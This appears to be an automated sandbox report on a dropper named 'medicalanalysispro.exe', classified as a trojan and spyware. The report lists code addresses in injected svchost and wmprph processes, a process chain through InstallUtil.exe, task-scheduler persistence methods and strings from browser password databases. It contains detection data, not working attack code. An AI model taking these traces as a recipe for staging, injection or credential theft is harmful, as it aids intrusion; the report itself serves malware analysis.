                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_0000018B293B5E9416_3_0000018B293B5E94
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_0000018B293B559416_3_0000018B293B5594
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_0000018B293B591416_3_0000018B293B5914
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_0000018B293B250D16_3_0000018B293B250D
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE5E286C16_3_00007DF4AE5E286C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6008CC16_3_00007DF4AE6008CC
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE61D42C16_3_00007DF4AE61D42C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE64CE4816_3_00007DF4AE64CE48
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6DDF6C16_3_00007DF4AE6DDF6C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE600EF416_3_00007DF4AE600EF4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE636BE416_3_00007DF4AE636BE4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE60CBE816_3_00007DF4AE60CBE8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6BDBC816_3_00007DF4AE6BDBC8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6CBC6816_3_00007DF4AE6CBC68
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE633CE816_3_00007DF4AE633CE8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6CDC9416_3_00007DF4AE6CDC94
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE63CC8416_3_00007DF4AE63CC84
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE64CD3816_3_00007DF4AE64CD38
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE63ECF816_3_00007DF4AE63ECF8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE5EF9C016_3_00007DF4AE5EF9C0
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6819B416_3_00007DF4AE6819B4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE5F7AE016_3_00007DF4AE5F7AE0
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE640AD416_3_00007DF4AE640AD4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6DAAB416_3_00007DF4AE6DAAB4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE64CB5C16_3_00007DF4AE64CB5C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE628B2816_3_00007DF4AE628B28
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6CEB0C16_3_00007DF4AE6CEB0C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6CE77416_3_00007DF4AE6CE774
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE65582416_3_00007DF4AE655824
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE5FE97016_3_00007DF4AE5FE970
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE63395C16_3_00007DF4AE63395C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6DA59816_3_00007DF4AE6DA598
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6C757816_3_00007DF4AE6C7578
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE63564016_3_00007DF4AE635640
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6CE5F416_3_00007DF4AE6CE5F4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6CD75C16_3_00007DF4AE6CD75C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE66071C16_3_00007DF4AE66071C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6143E416_3_00007DF4AE6143E4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6C23D816_3_00007DF4AE6C23D8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE68A3C816_3_00007DF4AE68A3C8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6513BC16_3_00007DF4AE6513BC
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE5F21F016_3_00007DF4AE5F21F0
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6CA19C16_3_00007DF4AE6CA19C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE65D24816_3_00007DF4AE65D248
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE64D2A016_3_00007DF4AE64D2A0
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6352F416_3_00007DF4AE6352F4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6D32F816_3_00007DF4AE6D32F8
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE5E5F9C16_3_00007DF4AE5E5F9C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE63FF7816_3_00007DF4AE63FF78
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE5E105816_3_00007DF4AE5E1058
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6010BC16_3_00007DF4AE6010BC
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6CE0B016_3_00007DF4AE6CE0B0
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000018B292A0C7016_2_0000018B292A0C70
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_3_00007DF47DF34EFC21_3_00007DF47DF34EFC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_3_00007DF47DF3220421_3_00007DF47DF32204
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_3_00007DF47DF3392C21_3_00007DF47DF3392C
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_3_00000242CA781F4021_3_00000242CA781F40
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_3_00000242CA78027B21_3_00000242CA78027B
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_3_00000242CA78366021_3_00000242CA783660
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_3_00000242CA78170E21_3_00000242CA78170E
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C0C2D021_2_00000242C8C0C2D0
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1321821_2_00000242C8C13218
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C0262C21_2_00000242C8C0262C
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1EABC21_2_00000242C8C1EABC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C40A4421_2_00000242C8C40A44
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3420C21_2_00000242C8C3420C
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C4422121_2_00000242C8C44221
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3522421_2_00000242C8C35224
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1723421_2_00000242C8C17234
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3D3C821_2_00000242C8C3D3C8
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C014D021_2_00000242C8C014D0
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C274EC21_2_00000242C8C274EC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3F4B821_2_00000242C8C3F4B8
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C30C4C21_2_00000242C8C30C4C
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1E40421_2_00000242C8C1E404
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C46C0821_2_00000242C8C46C08
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1C5D821_2_00000242C8C1C5D8
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C35D8421_2_00000242C8C35D84
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C39DA821_2_00000242C8C39DA8
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C355BC21_2_00000242C8C355BC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C4156421_2_00000242C8C41564
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1758021_2_00000242C8C17580
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1FD3C21_2_00000242C8C1FD3C
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C28E8821_2_00000242C8C28E88
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3669C21_2_00000242C8C3669C
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C27E5821_2_00000242C8C27E58
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1CE7021_2_00000242C8C1CE70
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C2467821_2_00000242C8C24678
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C15FCC21_2_00000242C8C15FCC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3AFF021_2_00000242C8C3AFF0
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3474421_2_00000242C8C34744
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C1D73021_2_00000242C8C1D730
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C360EC21_2_00000242C8C360EC
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C2089821_2_00000242C8C20898
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C350A421_2_00000242C8C350A4
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C4104821_2_00000242C8C41048
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C2786821_2_00000242C8C27868
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C2E02821_2_00000242C8C2E028
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3F9A421_2_00000242C8C3F9A4
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C3F15821_2_00000242C8C3F158
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C4011421_2_00000242C8C40114
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00007DF47DF422CC21_2_00007DF47DF422CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 324
                      Source: medicalanalysispro.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 48981 bytes, 2 files, at 0x2c +A "medicalanalysis.exe" +A "medicallanalysis.exe", ID 4018, number 1, 4 datablocks, 0x1503 compression
                      Source: medicalanalysispro.exeBinary or memory string: OriginalFilename vs medicalanalysispro.exe
                      Source: medicalanalysispro.exe, 00000000.00000003.1718933145.00000198507C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProxy.Client.exe: vs medicalanalysispro.exe
                      Source: medicalanalysispro.exe, 00000000.00000003.1718933145.00000198507C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemedicalanalysis_1.exeD vs medicalanalysispro.exe
                      Source: medicalanalysispro.exe, 00000000.00000003.1718835067.0000019852561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemedicalanalysis_1.exeD vs medicalanalysispro.exe
                      Source: medicalanalysispro.exe, 00000000.00000003.1718835067.0000019852561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProxy.Client.exe: vs medicalanalysispro.exe
                      Source: medicalanalysispro.exe, 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs medicalanalysispro.exe
                      Source: medicalanalysispro.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs medicalanalysispro.exe
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.medicalanalysis.exe.33e9550.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 1.2.medicalanalysis.exe.3439570.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 1.2.medicalanalysis.exe.5680000.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: medicalanalysis.exe, 00000001.00000002.2224296580.00000000036D8000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.00000000034FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                      Source: medicalanalysis.exe, 00000001.00000002.2224296580.00000000036D8000.00000004.00000800.00020000.00000000.sdmp, medicalanalysis.exe, 00000001.00000002.2224296580.00000000034FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@31/10@7/9
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE76CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF7BDE76CA4
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE71C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7BDE71C0C
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE766C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF7BDE766C4
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE5E286C CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,SuspendThread,16_3_00007DF4AE5E286C
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE72DB4 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17,0_2_00007FF7BDE72DB4
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\medicallanalysis.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:64:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-c50d30d3-8556-339baa-d1c50f81ff32}
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                      Source: medicalanalysispro.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                      Source: svchost.exe, 00000010.00000003.2736533411.0000018B2D4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2377528804.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736981735.00007DF4AE6E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2376545398.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736291781.0000018B2D390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: svchost.exe, 00000010.00000003.2736533411.0000018B2D4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2377528804.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736981735.00007DF4AE6E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2376545398.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736291781.0000018B2D390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: svchost.exe, 00000010.00000003.2736533411.0000018B2D4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2377528804.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736981735.00007DF4AE6E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2376545398.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736291781.0000018B2D390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: chrome.exe, 00000011.00000002.2517000137.0000643402921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2508179894.0000013A8DF80000.00000002.00000001.00040000.00000015.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                      Source: svchost.exe, 00000010.00000003.2736533411.0000018B2D4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2377528804.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736981735.00007DF4AE6E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2376545398.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736291781.0000018B2D390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: svchost.exe, 00000010.00000003.2736533411.0000018B2D4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2377528804.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736981735.00007DF4AE6E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2376545398.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736291781.0000018B2D390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: svchost.exe, 00000010.00000003.2736533411.0000018B2D4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2377528804.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736981735.00007DF4AE6E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2376545398.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736291781.0000018B2D390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: svchost.exe, 00000010.00000003.2501798145.0000018B29A17000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2502069455.0000018B2C637000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2508087609.0000013A8BBF5000.00000002.00000001.00040000.00000014.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: svchost.exe, 00000010.00000003.2736533411.0000018B2D4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2377528804.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736981735.00007DF4AE6E3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2376545398.0000018B2D010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2736291781.0000018B2D390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: medicalanalysispro.exeVirustotal: Detection: 21%
                      Source: medicalanalysispro.exeReversingLabs: Detection: 52%
                      Source: unknownProcess created: C:\Users\user\Desktop\medicalanalysispro.exe "C:\Users\user\Desktop\medicalanalysispro.exe"
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
